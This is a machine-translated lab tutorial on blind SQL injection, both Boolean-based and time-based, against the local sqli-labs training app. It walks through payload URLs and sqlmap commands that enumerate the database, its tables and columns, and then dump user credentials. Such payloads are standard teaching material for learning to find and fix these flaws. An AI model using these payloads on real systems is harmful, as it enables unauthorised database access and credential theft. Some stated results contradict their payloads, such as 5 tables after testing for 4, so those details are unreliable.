Blind injection of sql injection
-
catalogue
-
Blind injection principle
-
Boolean blind note
-
Time blind injection
-
sqlmap blind injection
1, Blind injection principle
1. Blind injection application scenario
Blind injection is often used where there is no detailed echo when interacting with the database; Boolean blind injection is injected according to the normal / abnormal (right / wrong) of the page return value; Time blind injection is injected according to the delay time of sleep;
2. Analysis of blind note statements
Boolean blind note common statements: select id, username, password from users where id ='1 'and length (database()) = 8
What is important here is and; Because if and is true; You need left and right to be true. Therefore, when the right length(database())=x is true, the normal page will be returned; when the right length(database())=x is not true, the wrong page will be returned; Boolean blind injection is blind injection based on right / wrong
3. Blind injection source code analysis
View the source code of the eighth pass of sqli labs master
mysql_quert function: execute a MySQL query
mysql_fetch_array function: get a row from the result set as an associative array or a numeric array
You can see that the main thing is to pass in a get variable $ID, and then execute an sql statement: "SELECT * FROM users WHERE id='$id' LIMIT 0,1"
Then make if judgment; If there is echo in the sql statement, You are in; Output if there is no echo; That is, if the sql statement is correct, You are in; If the sql statement is wrong, nothing will be output;
4. Common functions of blind injection
length() queries the specified number of string characters
ascii() Converts the specified character to ASCII code
mid(data,start,leng) intercepts a string of a specified length
sleep() Delay time output
count() Number of queries
if() Conditional judgment statement
2, Boolean blind note
Target: the eighth pass of sqli labs master
1. Query injection point
?id=1' and 1=1-- - correct;?id=1' and 1=2-- - error
2. Query database
(1) Query database name characters
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and length(database())=8-- -
The number of characters queried is 8
(2) Query the first character of database name
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and ascii(mid(database(),1,1))=115-- -
According to the ascii code, the first character is s
ascii comparison table—— ASCII code list, ASCII code comparison table (biancheng.net)
The latter can directly use burp blasting
burp blasting steps:
1) Set up agent; Intercept packets
2) Forward to introder (Shortcut Ctrl+l)
3) Set blasting position (variable)
4) Select payloads to configure the dictionary
First parameter
Second parameter
5) Blasting; Select the parameters found in the echo;
Based on the location and ascii values, it is easy to conclude that the database name is security
3. Query data table
(1) Number of query data tables
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(table_name) from information_schema.tables where
table_schema='security')=4-- -
The number of subordinate tables in the security database is 5
(2) Query the number of characters in the first table
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(table_name) from information_schema.tables where
table_schema='security' limit 0,1)=6-- -
The number of characters in the first table is 6
(3) Query the first character of the first table
Other characters are similar to changing the start bit of mid function; In other tables, the start bit of the limit function is changed similarly; The users table exists
4. Query field
(1) Query the number of users table fields
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select count(column_name) from information_schema.columns where
table_name='users' and table_schema='security')=3-- -
The query shows that there are three fields under the users table
(2) Number of characters to query the first field
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(column_name) from information_schema.columns
where table_name='users' and table_schema='security' limit 0,1)=2-- -
It can be concluded that the number of fields in the first field is 2
(3) Query the first character of the first field
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select ascii(mid((column_name),1,1)) from information_schema.columns where table_name='users' and table_schema='security' limit 0,1)=105-- -
The first character of the first field is i
Similarly; The second character is d; The second table is username; The third table is password
5. Query data
(1) Number of query data characters
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select length(concat(id,0x7e,username,0x7e,password)) from users limit 0,1)=11-- -
The number of characters of the first (id~username~password) is 11
(2) Query data character
http://127.0.0.1/sqli-labs-master/Less-8/?id=1' and (select ascii(mid((concat(id,0x7e,username,0x7e,password)),1,1)) from users
limit 0,1)=49-- -
The first character number is 1
The rest of the above examples can get all the data
3. Time blind injection
Target: sqli labs master 9th pass
The only difference between time blind injection and Boolean blind injection: Boolean blind injection judges right and wrong according to echo; Time blind injection judges right and wrong according to time delay
1. Query injection point
It is found that mysql has two features:
As long as the query is a number, the first number mainly matches the database; And no number is added after it; Any other characters have no effect (for numeric indexes only)
It is found that no matter what value is entered in question 9, it returns a fixed value; Therefore, Boolean blind injection cannot be used; Only delayed blind injection can be used to judge the injection point
?id=1' and if(1=1,sleep(0),sleep(5))-- - When, the delay is short 2 s;?id=1' and if(1=2,sleep(0),sleep(5))-- - When, the delay is longer 7 s
There is an injection point and the symbol is closed‘
2. Query database
(1) Query database characters
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(database()))=8,sleep(5),sleep(0))-- -
When equal to 8, the delay is long; So the number of database characters is 8
(2) Query database first character
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(database(),1,1)))=115,sleep(5),sleep(0))-- -
When the first character ascii code is 115, the delay is long; So the first character in the database is s
Then, similarly, by changing the position of the start bit of the mid function, you can get the database name security
3. Query table
(1) Query the number of security tables
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(table_name) from information_schema.tables where
table_schema='security')=4,sleep(5),sleep(0))-- -
When the number of tables is 4, the delay is long; Therefore, there are four tables under the security database
(2) Query the number of characters in the first table
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(table_name) from information_schema.tables where
table_schema='security' limit 0,1)=6,sleep(5),sleep(0))-- -
When the number of characters is 6, the delay is long, so the number of characters in the first table is 6
(3) Query the first character of the first table
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid((table_name),1,1)) from information_schema.tables
where table_schema='security' limit 0,1)=101,sleep(5),sleep(0))-- -
When the first number ascii code is 101, the delay is long; So the first character of the first table is e
After installing the above format query, you can find the table of users in one of the four tables
4. Query field
(1) Query the number of fields under the users table
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select count(column_name) from information_schema.columns where
table_name='users' and table_schema='security')=3,sleep(5),sleep(0))-- -
Query that there are 5 fields under the users table
(2) Query the number of characters in the first field of the users table
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(column_name) from information_schema.columns
where table_name='users' and table_schema='security' limit 0,1)=2,sleep(5),sleep(0))-- -
The number of characters in the first field is 2
(3) Query the first character of the first field
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(column_name,1,1)) from information_schema.columns
where table_name='users' and table_schema='security' limit 0,1)=105,sleep(5),sleep(0))-- -
The first character of the first field is i
All fields can be obtained from the above routine: id username password
5. Query data
(1) Number of data characters in the first column of query
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select length(concat(id,0x7e,username,0x7e,password)) from users
limit 0,1)=11,sleep(5),sleep(0))-- -
Description the combination of id~username~password in the first column is 11 characters
Query the first character of the first column
http://127.0.0.1/sqli-labs-master/Less-9/?id=1' and if((select ascii(mid(concat(id,0x7e,username,0x7e,password),1,1)) from users
limit 0,1)=49,sleep(5),sleep(0))-- -
The first character in the first column is 1
All the characters in the first column are: 1~Dumb~Dumb
sqlmap tool blind injection
1. Common parameters of sqlmap
-u specify url
-p specifies the injection parameters
-D specifies the database name
-T specifies the table name
-C specifies the column name
--dbs Query all database names
--Current DB queries the current database name
--Tables query all tables
--Columns queries all columns
--batch automation default operation
-r specifies the path to the package caught by burp (suitable for post; with cookie; authentication free)
--forms Automatically identify that the post form parameters are suitable for URLs without login, or add cookie s manually
--Cookie specifies a cookie
--technique Q Specify the injection method as inline query
--technique B Specifies that the injection method is Boolean blind injection
--technique T Specify the injection method as time blind injection
2. sqlmap Boolean blind annotation
Target: sqli labs master 8th pass
Attacker: 127.0.0.1
(1) Query whether there is an injection point
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --batch
The id obtained from the query is an injectable point based on Boolean
(2) Query current database name
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B --current-db --batch
(3) Query table name
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security --tables --batch
(4) Query field name
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security -T users --columns --batch
(5) Query data
sqlmap -u "127.0.0.1/sqli-labs-master/Less-8/?id=1" --technique B -D security -T users -C username --dump --batch
3. sqlmap time blind injection
Target: sqli labs master 9th pass
The time blind note is the same as the Boolean blind note, but you need to replace -- technology B with -- technology t
(1) Query whether there is an injection point
slightly
(2) Query database name
slightly
(3) Query table name
slightly
(4) Query field name
slightly
(5) Query data
sqlmap -u "127.0.0.1/sqli-labs-master/Less-9/?id=1" --technique T -D security -T users -C username --dump --batch
Injection is too slow to wait; But long enough to inject success